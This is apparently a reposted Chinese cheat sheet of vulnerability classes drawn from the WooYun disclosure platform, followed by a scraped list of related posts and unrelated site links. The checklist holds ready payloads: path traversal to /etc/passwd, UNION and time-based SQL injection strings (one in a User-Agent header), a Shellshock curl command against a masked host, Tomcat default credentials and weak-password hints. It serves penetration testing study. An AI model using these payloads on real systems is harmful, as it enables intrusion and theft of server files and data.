那些年 WooYun 的漏洞
Type:
任意文件读取
../../../../../../../../../../etc/passwd%00
/etc/sysconfig/network
../../../foo/../../../../etc/passwd //nodejs
SQL注入
and 1=2 union select 1,2,version(),3%23 blind sqli error sqli 宽字节注入
框架注入(ThinkPHP)
GET POST 参数
伪静态 *
Referer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
弱口令
Username:中国姓名排行TOP500 Password:admin admin123 qyer //字典的重要性!!!
/manager/html tomcat:tomcat
ftp 弱口令 phpmyadmin 弱口令
敏感信息泄露
.bak /.svn/entries wwwroot.tar.gz .swp web.rar %domain%.zip %dictionary%.rar
openssl
目录遍历
shodan
github 敏感信息
.NET 相关类 逆向解密 dll
api 接口泄露
社工库查询相关人员信息
未授权访问
RSYNC 匿名访问
JBoss:/jmx-console/ /admin-console/
命令执行
CMS(discuz、)命令执行
curl http://1XX.XX.XX.XX:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
http://test.xxx.com:8082/struts_spy/example/HelloWorld.action //struts2
任意文件上传
cer、
SSRF
url= //ip服务
DNS Rebinding 绕过
设计缺陷
验证码可识别
水平越权,修改相关参数
任意用户邮箱地址查询:修改对应查询参数
任意密码重置:验证身份token简单可爆破
单点登陆绕过:其它参数替代绕过
转载于:https://www.cnblogs.com/skrr/p/10987425.html
那些年 WooYun 的漏洞相关推荐
- 爬虫python漏洞群_python爬虫 之 wooyun公开漏洞
准备加上一些小功能. 重新写了一下代码,先保存在这里: import requests import re def first(): import sys reload(sys) sys.setdef ...
- iku爱酷后台开放匿名代理服务 | WooYun-2011-02909 | WooYun.org
iku爱酷后台开放匿名代理服务 | WooYun-2011-02909 | WooYun.org iku爱酷后台开放匿名代理服务 | WooYun-2011-02909 | WooYun.org 漏洞 ...
- 代码审计-dubbo admin =2.6.1远程命令执行漏洞
前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...
- 开发文档怎么编写_PoC 编写指南
什么是 PoC PoC(全称: Proof of Concept), 中文译作概念验证.在安全界,你可以理解成为漏洞验证程序.和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点 ...
- CTF——web个人总结
CTF web个人总结 仅供个人参考 从0开始接触到了CTF,算是入门了,为了方便自己做题,现在记录一下web类型题目的解题思路. 目录 CTF web个人总结 工具(含后渗透) 解题思路 一.普通思 ...
- 中国互联网创业工具库startup tool【转】
在做17Startup.com的过程中,斯坦福商学院的教授.也是硅谷最为知名的"创业学大师"Steve Blank的博客给了我们很多的启发,尤其是他所做的"Startup ...
- 创业必读网站和工具集合
from:http://www.caoyuan.net.cn/post/2012-06-27/40028725336 一.第三方创业投资服务平台 1.科技及投资类媒体(原创类文章为主) 36氪,htt ...
- 程序员应该知道的网站
技术资讯 知乎周刊:知乎工作人员和志愿者团队的合作制作完成. 码农周刊:一份专为程序员打造的IT技术周刊.我们会为你精选一周IT技术干货,每周一发送,完全免费. PyCoder's Weekly:提供 ...
- 如何入门web渗透?
咦~ 渗透的话,我是菜鸟,其实不止渗透,其余的我都是菜鸟 首先你得会html+js吧,CSS这里我不说了,能懂自然是好的 然后会js后,你就可以深入一下XSS了 之后你一个黑客而且还是web端的黑客, ...
最新文章
- 洛谷8月赛Div.2
- 科研杂谈 | 全球最大的数字图书馆
- 元组Tuple、数组Array、映射Map
- mac OS下显示.htaccess等隐藏文件
- 微软重新开源 MS-DOS 1.25/2.0:已诞生 36 年
- 这 6 个 Spring Boot 项目够经典
- 会签是什么意思_后宫为什么要争宠·六
- 【iVX 初级工程师培训教程 10篇文拿证】03 事件及猜数字小游戏
- (转)百度Map API
- WindowsServices_无法拷贝文件到服务器
- php易语言互交_易语言php编码转换 易语言与php数据交互
- xposed框架_Xposed框架安装、使用以及插件开发
- PS 解决不能完成命令,暂存盘空间不足的问题
- TP5和TP3.2区别
- 1. 从WordPress搬家到网易博客!
- 华为路由器交换机常用命令(随时补充更新)
- 导出Excel—外部表不是预期的格式
- mysQL uuID 查询
- 成功解决502 Bad Gateway错误。
- C语言没学好,C++听不懂,怎么办?
热门文章
- SCAU 计算智能 18290 校赛排名2
- 图说 ES Modules
- FFmpeg内存的分配和释放---av_malloc()、av_free()等
- HashMap底层红黑树实现(自己实现一个简单的红黑树)
- Python批量下载小姐姐图片(含完整代码)
- java第16次作业API接口查询天气
- Word处理控件Aspose.Words功能演示:使用C#创建MS Word文档
- bluestacks 爬虫_如何将Android Studio连接到Bluestacks
- 初级前端-react学习(1)
- app内图片灰色效果实现